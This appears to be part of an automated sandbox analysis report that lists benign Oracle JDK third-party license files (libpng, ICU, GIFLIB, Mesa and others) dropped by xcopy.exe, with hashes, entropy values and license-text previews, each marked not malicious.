                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\ecc.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29223
                                                                                                                                                                                                                                  Entropy (8bit):4.641601907789342
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:D0tE56OuAbn/0UVef6wFDVxnF+7xqsvLt+z/k8E9HinIVFkspWM9bc7ops08ZuQC:D0tE5trbernFCL1leSWmc7ksNZuQC
                                                                                                                                                                                                                                  MD5:E8F9964AA44A69F88930D10B6ADEB0B1
                                                                                                                                                                                                                                  SHA1:EF139F26EC3EE452C3FC3E7C39D99E8CD2A32F81
                                                                                                                                                                                                                                  SHA-256:A0ACC59CC26BA8DB60D1641DBB84F9F97200F046DC78079E89F9C50C061C980F
                                                                                                                                                                                                                                  SHA-512:64C5360C9E9F9B3BC2C3C49B6405EF0F541990737F6DDB6940DE276FAABC1432EC0101063E21CE749A00B6D2AE8FE6B541903B9252054B818E768F79ED92A67A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Mozilla Elliptic Curve Cryptography (ECC)..### Mozilla ECC Notice..```.This notice is provided with respect to Elliptic Curve Cryptography,.which is included with JRE, JDK, and OpenJDK...You are receiving a copy.of the Elliptic Curve Cryptography library in source.form with the JDK and OpenJDK source distributions, and as object code in.the JRE & JDK runtimes...In the case of the JRE & JDK runtimes, the terms of the Oracle license do.NOT apply to the Elliptic Curve Cryptography library; it is licensed under the.following license, separately from Oracle's JDK & JRE. If you do not wish to.install the Elliptic Curve Cryptography library, you may delete the.Elliptic Curve Cryptography library:. - On Solaris and Linux systems: delete $(JAVA_HOME)/lib/libsunec.so. - On Windows systems: delete $(JAVA_HOME)\bin\sunec.dll. - On Mac OSX systems: delete. For JRE: /Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/lib/libsunec.dylib. For JDK: $(JAVA_HOM

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\freebxml.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2957
                                                                                                                                                                                                                                  Entropy (8bit):5.22027056591088
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Jxy8ZtU/b2OOrYJarYJTjqA1LaoMo7mrSPKAP26Ts432sBpXFAx3/E/I3tETph:JNtOHOrYJarYJTdfMDrt6j37FAx3/36D
                                                                                                                                                                                                                                  MD5:409FC7D453B37E23E9ABEF873A810ED8
                                                                                                                                                                                                                                  SHA1:0C9427F433E516E7CD2A2F292EB9D0A0A61010D3
                                                                                                                                                                                                                                  SHA-256:8800731AB11E49C7B4A9D18E0E21882D9949F7DCBCC4540B8024F962CFE65B11
                                                                                                                                                                                                                                  SHA-512:B3E2F4B3119175218577EE00001FEFED21F84E1421713DA3EB5C1D482A5092A7B28824D35208CC4ED72404B94BD5F273CC4DB660938D1E6E2F8A2DCD8ED30DED
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## freebXML Registry v3.1..### freebXML Notice.```.. *. * This software consists of voluntary contributions made by many. * individuals on behalf of the freebxml Software Foundation. For more. * information on the freebxml Software Foundation, please see. * "http://www.freebxml.org/".. *. * This product includes software developed by the Apache Software. * Foundation (http://www.apache.org/).. *. * $Header: /cvsroot/ebxmlrr/omar/license.txt,v 1.3 2006/04/16 19:10:35 dougb62 Exp $. *..```...### The freebXML License, Version 1.1.```.. ====================================================================. *. * The freebxml License, Version 1.1. *. * Copyright (c) 2001 freebxml.org. All rights. * reserved.. *. * Redistribution and use in source and binary forms, with or without. * modification, are permitted provided that the following conditions. * are met:. *. * 1. Redistributions of source code must retain the above copyright. * notice, this list of conditions and the following dis

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\giflib.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1293
                                                                                                                                                                                                                                  Entropy (8bit):5.2507757788144955
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jXksrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4q/m3oqLF5/zwO8p1:7ksaJHlxE35QHOs5e/m3ogF5/rq1
                                                                                                                                                                                                                                  MD5:492019DF920279BAEAC09AA0C64F8434
                                                                                                                                                                                                                                  SHA1:7890596300F139834F6A32D16210337261FB5498
                                                                                                                                                                                                                                  SHA-256:9139BDC457EEE7432A019A24F18065C7DDF79CC9486E1F9D54C73D1E2CD5B504
                                                                                                                                                                                                                                  SHA-512:AABE3502058AED12C8544E9103594F76161ABB9F81A842742FFB9C80BE7424587D2C64469FE28651EFCEB13AE461B28BE5F46A7A35EB9E060405BD36F1E3BEEC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## GIFLIB v5.2.1..### GIFLIB License.```..The GIFLIB distribution is Copyright (c) 1997 Eric S. Raymond..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF C

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\icu.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2930
                                                                                                                                                                                                                                  Entropy (8bit):5.2474229778556385
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:fmQ5eKjpNhAY4FCNPcwSHW5rSr+lP1JKrzteztw/wHasTI4c/Lr0in/Prfk05:fmQlp/thP97fPQzkzqYHJc/3V/Prf55
                                                                                                                                                                                                                                  MD5:F06C93F6E0508FF7475234CFF59D9F0A
                                                                                                                                                                                                                                  SHA1:BE09FA29C875F3957947A3A93B2D5F4063FCBD82
                                                                                                                                                                                                                                  SHA-256:8EC7DFC03761F581C0DDE060B794BDA2C657A9DB708ABAAF05BE48E1889B4674
                                                                                                                                                                                                                                  SHA-512:DD27147C253252E76012CE4B0C8BD4DBC3DC5E3E31CBC068438BABE22CE7D54725474D30F2B075739F9926EC6477A9CF91962358C50700FA3AA2A703006324E1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## International Components for Unicode (ICU4J) v60.2..### ICU4J License..```..UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE.Unicode Data Files include all data files under the directories.http://www.unicode.org/Public/, http://www.unicode.org/reports/,.http://www.unicode.org/cldr/data/,.http://source.icu-project.org/repos/icu/, and.http://www.unicode.org/utility/trac/browser/...Unicode Data Files do not include PDF online code charts under the.directory http://www.unicode.org/Public/...Software includes any source code published in the Unicode Standard.or under the directories.http://www.unicode.org/Public/, http://www.unicode.org/reports/,.http://www.unicode.org/cldr/data/,.http://source.icu-project.org/repos/icu/, and.http://www.unicode.org/utility/trac/browser/...NOTICE TO USER: Carefully read the following legal agreement..BY DOWNLOADING, INSTALLING, COPYING OR OTHERWISE USING UNICODE INC.'S.DATA FILES ("DATA FILES"), AND/OR SOFTWARE ("SOFTWARE"),.YOU UNEQUIVOCALLY ACC

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\jcup.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1447
                                                                                                                                                                                                                                  Entropy (8bit):4.528080270649301
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jjlpTTCb5r9q6kqyiuZLX2DjXkIMmgmlye4ihXSZX3AVmF0RevTIRX2U8Zxa:1pTTIvteiupX2DNtgmlyF2Xi1F0Rjmdi
                                                                                                                                                                                                                                  MD5:C1FA2837B84DA0D9C48466B7F4ED6470
                                                                                                                                                                                                                                  SHA1:C13FC449A215750D85CB8BFF487DB242C2AF1CFF
                                                                                                                                                                                                                                  SHA-256:C987390CB38E2D418F3DDAC07BAEF75647F2A64E75B25A0B4FADAE1F39DBB333
                                                                                                                                                                                                                                  SHA-512:44337F20AE7F2438162CCB554F2A79441E48007F55EFAA330A55BDBBA7F7D9D2ACE2C47C4BD7CBA8ECF41EEE5E57F2063AE004D18D6CD684C8575203E42E0C8C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## CUP Parser Generator for Java v 0.11b..### CUP Parser Generator License..```.Copyright 1996-2015 by Scott Hudson, Frank Flannery, C. Scott Ananian, Michael Petter..Permission to use, copy, modify, and distribute this software and its.documentation for any purpose and without fee is hereby granted, provided.that the above copyright notice appear in all copies and that both.the copyright notice and this permission notice and warranty disclaimer.appear in supporting documentation, and that the names of the authors or.their employers not be used in advertising or publicity pertaining to.distribution of the software without specific, written prior permission...The authors and their employers disclaim all warranties with regard to.this software, including all implied warranties of merchantability and.fitness. In no event shall the authors or their employers be liable for.any special, indirect or consequential damages or any damages whatsoever.resulting from loss of use, data or profits, w

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\joni.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1104
                                                                                                                                                                                                                                  Entropy (8bit):5.177263520488824
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jWrRONJHLH0cPP3gtkHw1h39QHGhsUv4eOk4/+jvho3nPR:ytONJbbvE/NQHGhs5eNS3np
                                                                                                                                                                                                                                  MD5:894BAFF13E0AED349B77B465B57F429B
                                                                                                                                                                                                                                  SHA1:932F3D7E8A6307D4EFE7E4BB529C8BEA64E674CB
                                                                                                                                                                                                                                  SHA-256:FC5FDB11A106142EDF2271803029DAB23320714763BFDE5E225450F3D5711F7D
                                                                                                                                                                                                                                  SHA-512:1B1036EF067992B23AD0DAC2F0C3036DB4E786BAAB1AC24A17B7ED2CF610CAC6CDBEE1AF1862C8F72BAE4E256E4425BB884C0084BA1CA4B174AF835135BB1355
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## JRuby Joni v2.1.43..### MIT License.```..Copyright (c) 2017 JRuby Team..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,.ARIS

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\jopt-simple.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1115
                                                                                                                                                                                                                                  Entropy (8bit):5.1870753062508
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jGYniJHxRHuyPP3GtIHw1Gg9QHGhsUv4eOk4/+jvho3nPZ:yYniJzfPvGt7ICQHGhs5eNS3nx
                                                                                                                                                                                                                                  MD5:3E20D03F3AB0742D0B0A35BA1215FEDD
                                                                                                                                                                                                                                  SHA1:A68353B6AE21632813BB8CFACC5741703B16FC7E
                                                                                                                                                                                                                                  SHA-256:EF38F6F236AA85BB2C01160F741F0C02EF1A76B80021E3E85CA8DAFC0A6E2883
                                                                                                                                                                                                                                  SHA-512:EB5B02852A54E8072C1D75D6D3FD04D921ACC02E37CB5DC63C2EB4818E3F33B3770A71FE97C97ABFAA0D2481EA3650552E6259972350142FBA14BFBE8753C559
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## jopt-simple v3.0..### MIT License.```..Copyright (c) 2004-2009 Paul R. Holser, Jr...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTH

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\jpeg.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3992
                                                                                                                                                                                                                                  Entropy (8bit):4.656727026124848
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:4K84O6ZloAD2/EViOqSeNDYYJjWdyejpsZ:4K8z6AasE4OUIU2sZ
                                                                                                                                                                                                                                  MD5:78403EDDFD77B7F194AD07541FF1A88C
                                                                                                                                                                                                                                  SHA1:3A2280A0FC1B05A3CCDCD328E6C9D9D47ABDBC66
                                                                                                                                                                                                                                  SHA-256:3B0B5D9C7587A7F194966A793D08F9D81F067457A9A68209DC25C908C03998CE
                                                                                                                                                                                                                                  SHA-512:82A31CC6402B6B1C5D5E527EE93DDF09386AC4CC2CEC2666140FCD38A36993BA8CB799D6280FEC76FC6101370699C0BC831AC9B84DAB5E439CC4052C3C38296D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Independent JPEG Group: JPEG release 6b..### JPEG License.```..Must reproduce following license in documentation and/or other materials.provided with distribution:..The authors make NO WARRANTY or representation, either express or implied,.with respect to this software, its quality, accuracy, merchantability, or.fitness for a particular purpose. This software is provided "AS IS",.and you, its user, assume the entire risk as to its quality and accuracy...This software is copyright (C) 1991-1998, Thomas G. Lane..All Rights Reserved except as specified below...Permission is hereby granted to use, copy, modify, and distribute.this software (or portions thereof) for any purpose, without fee,.subject to these conditions:..(1) If any part of the source code for this software is distributed,.then this README file must be included, with this copyright and no-warranty.notice unaltered; and any additions, deletions, or changes to the original.files must be clearly indicated in accompanying do

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\lcms.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2630
                                                                                                                                                                                                                                  Entropy (8bit):5.23012419800887
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:/kQnDiJzfPvGtXICQH+sfINi3OMFO4+XnDtdfOBFTgqKJfW4AhY9gaXWhk:zYPutYCQHXOaMDTOB6JO3Y9z
                                                                                                                                                                                                                                  MD5:04A8A77CAFDD6185A3506ECCF7A83346
                                                                                                                                                                                                                                  SHA1:1ACBEC21E9EAB8BD2BEE9826353C1E768D5457B5
                                                                                                                                                                                                                                  SHA-256:8ACF00B5EFD25C1C055927222FD3C26B0C9FD02ED02E478C225B64E7A24D9782
                                                                                                                                                                                                                                  SHA-512:A91FAA243A09BDFE62714859B9B4420E8434DD09693A6A280E1C8EF6694FB7858D0171FAE4CA36721B685E3AB8BC8000C5635BF3789250A5B9081130EB4FF57C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Little Color Management System (LCMS) v2.15..### LCMS License.<pre>.README.1ST file information..LittleCMS core is released under MIT License..---------------------------------..Little CMS.Copyright (c) 1998-2023 Marti Maria Saguer..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject.to the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\libpng.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6917
                                                                                                                                                                                                                                  Entropy (8bit):4.868728080688719
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:cDuVlzhu3psX8aB9Mo3AWobRafwOOn6Qu:cuzhu3psX8aB9Mo3kafwOOn6Qu
                                                                                                                                                                                                                                  MD5:6F75AB13B20D4C6BBDB207A5DF282D7A
                                                                                                                                                                                                                                  SHA1:BA86C9938BE37C424D59E13EFE0EC64E53470967
                                                                                                                                                                                                                                  SHA-256:DE52F63E2A34591E42E6352C40C91C98E13452E9D9FBCDA074A3301D0DB8C209
                                                                                                                                                                                                                                  SHA-512:3391DB7828667BE74A158F35E6896794F3BCCCFEEFAF5A08D1D3D8BD63115B0F36EA96A645C73665B9AE4678143775957061A38492CF14A054FF2813A1C5D81D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## libpng v1.6.38..### libpng License.<pre>..COPYRIGHT NOTICE, DISCLAIMER, and LICENSE.=========================================..PNG Reference Library License version 2.---------------------------------------..Copyright (c) 1995-2022 The PNG Reference Library Authors..Copyright (c) 2018-2022 Cosmin Truta.Copyright (c) 1998-2018 Glenn Randers-Pehrson.Copyright (c) 1996-1997 Andreas Dilger.Copyright (c) 1995-1996 Guy Eric Schalnat, Group 42, Inc...The software is supplied "as is", without warranty of any kind,.express or implied, including, without limitation, the warranties.of merchantability, fitness for a particular purpose, title, and.non-infringement. In no event shall the Copyright owners, or.anyone distributing the software, be liable for any damages or.other liability, whether in contract, tort or otherwise, arising.from, out of, or in connection with the software, or the use or.other dealings in the software, even if advised of the possibility.of such damage...Permission is he

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\mesa3d.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5732
                                                                                                                                                                                                                                  Entropy (8bit):5.1453426112774965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:FqsVQHfoGKlxESLI1GXVsCGQHlzQUGP+0nWeHGT+weUGP+0nWeHGT+wI:RQHfh4hE1GX1GQH9pqnWeHGySqnWeHGK
                                                                                                                                                                                                                                  MD5:B0F646AC99116CABE48CF7D0A43708B1
                                                                                                                                                                                                                                  SHA1:60228B860A66176C2FAFFA048079103E5F4B69D8
                                                                                                                                                                                                                                  SHA-256:4B326D2B6BC09DA510E3D0F3A1EFF9E26C0E023C309858B6585016EE662C9661
                                                                                                                                                                                                                                  SHA-512:B739AD6B4DC39AD0E2268EA60243DCC11A6A236A0A04488AACBF0103D0C754F1FFC405EC99EAC95A56C312FC63BBE99BA51A1F33D69DFDE37F74979B51732C3F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Mesa 3-D Graphics Library v21.0.3..### Mesa License.```..Copyright (C) 1999-2007 Brian Paul All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\pkcs11cryptotoken.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3924
                                                                                                                                                                                                                                  Entropy (8bit):4.826334543557357
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+tC/GvWZpnLtVVuXdfgnWTRshYzxkhXSWR1kM8oT6i6hqgamulkbXdrRjNYRTh5a:vGObLxI0W6hCukJe6i6HDXdrRkTL2
                                                                                                                                                                                                                                  MD5:86CF531AE15B0B5BACAE5F941A6E6750
                                                                                                                                                                                                                                  SHA1:0C036D2463FA269FE183BEBB2EDB637CFDB740D2
                                                                                                                                                                                                                                  SHA-256:B56823253DBA233573F153696A343505832716A050C2AB203C94073F30B63260
                                                                                                                                                                                                                                  SHA-512:ECF934E7F10FBB6808725C310024921CF7E4F03B5EAF1AAEA774DC72D5DFA8DB171CECA791C6C8E00143CDFC34D639043C822D9EBBC307C9C3ADB8C316229254
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## OASIS PKCS #11 Cryptographic Token Interface v3.0..### OASIS PKCS #11 Cryptographic Token Interface License.<pre>..Copyright . OASIS Open 2020. All Rights Reserved... All capitalized terms in the following text have the meanings.assigned to them in the OASIS Intellectual Property Rights Policy (the."OASIS IPR Policy"). The full Policy may be found at the OASIS website:.[http://www.oasis-open.org/policies-guidelines/ipr].. This document and translations of it may be copied and furnished to.others, and derivative works that comment on or otherwise explain it or.assist in its implementation may be prepared, copied, published, and.distributed, in whole or in part, without restriction of any kind,.provided that the above copyright notice and this section are included.on all such copies and derivative works. However, this document itself.may not be modified in any way, including by removing the copyright.notice or references to OASIS, except as needed for the purpose of.developing

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\pkcs11wrapper.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2126
                                                                                                                                                                                                                                  Entropy (8bit):5.172589746189614
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Bu9OOrXIJHJzI/NNl+eMuj2PMicp32srF32sZEtY17wBHN:5OrXIJHJz+NFMwhp3131EBt
                                                                                                                                                                                                                                  MD5:65933EB0FA6B3C3E93FB30B2F2613131
                                                                                                                                                                                                                                  SHA1:B1783DDCB9E112987DEB97E14D30BE27DF7061D0
                                                                                                                                                                                                                                  SHA-256:12DD724A8014735DEC61B95CA4417476688C07DD1550CC9C1071637806E232A0
                                                                                                                                                                                                                                  SHA-512:4F784BCEA1D66EAA7C56C31D3F2D00061963CA1B437774DBBB7BDBB3E62F92FF426419E075D8FEB82A2F984FAEE4B1573DD175D0C152699B8BBE3313EBC18FAF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## IAIK (Institute for Applied Information Processing and Communication) PKCS#11 wrapper files v1..### IAIK License.```..Copyright (c) 2002 Graz University of Technology. All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...3. The end-user documentation included with the redistribution, if any, must. include the following acknowledgment:.. "This product includes software developed by IAIK of Graz University of. Technology.".. Alternately, this acknowledgment may appear in the software itself, if and. wherever such third-party

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\relaxngcc.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2126
                                                                                                                                                                                                                                  Entropy (8bit):5.219606113828308
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:PXC6OOrXIJHJz8uCltNonuP7gPrCp32sr3u9tk3hEtI33tEFHN:QOrXIJHJzGoCp3Huzk3h9OFt
                                                                                                                                                                                                                                  MD5:7A73168E2D1D60635D4A477735EF9C46
                                                                                                                                                                                                                                  SHA1:03698BDDF01C463ED4ADD5707136A067F9446551
                                                                                                                                                                                                                                  SHA-256:DA023D685DCF9206EBA77AFF21957E09633084903991BA422625D41EF18E6073
                                                                                                                                                                                                                                  SHA-512:8122E4B9D698632B36085C9A334883756B4499EE5CBB80760F3B1C31D50C9121F788B838664171CCEF20CEBFFA04723D7536004F6DBF31174EDDF2825A55B8D5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## RelaxNGCC v 1.12..### RelaxNGCC License..```..Copyright (c) 2000-2003 Daisuke Okajima and Kohsuke Kawaguchi. .All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...3. The end-user documentation included with the redistribution, if any, must. include the following acknowledgment:.. "This product includes software developed by Daisuke Okajima. and Kohsuke Kawaguchi (http://relaxngcc.sf.net/)."..Alternately, this acknowledgment may appear in the software itself, if and.wherever such third-party acknowledgments normally appear...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\relaxngdatatype.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Algol 68 source, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1597
                                                                                                                                                                                                                                  Entropy (8bit):5.129158378658016
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:OIx0OOYrYJeNrYJFSEz4943J/32sBEtI33tEHN:l0bYrYJeNrYJFSAN393d9ut
                                                                                                                                                                                                                                  MD5:19C79CD6C27E7AA0E4AE4AE2F8D25F66
                                                                                                                                                                                                                                  SHA1:2B95E8949E7D1DCA8DCFC4D822357863FE67341E
                                                                                                                                                                                                                                  SHA-256:8454B0B740CD1FDB98B9A5D56685C872B1C548B6308E5A8E8CFE2164474AC53C
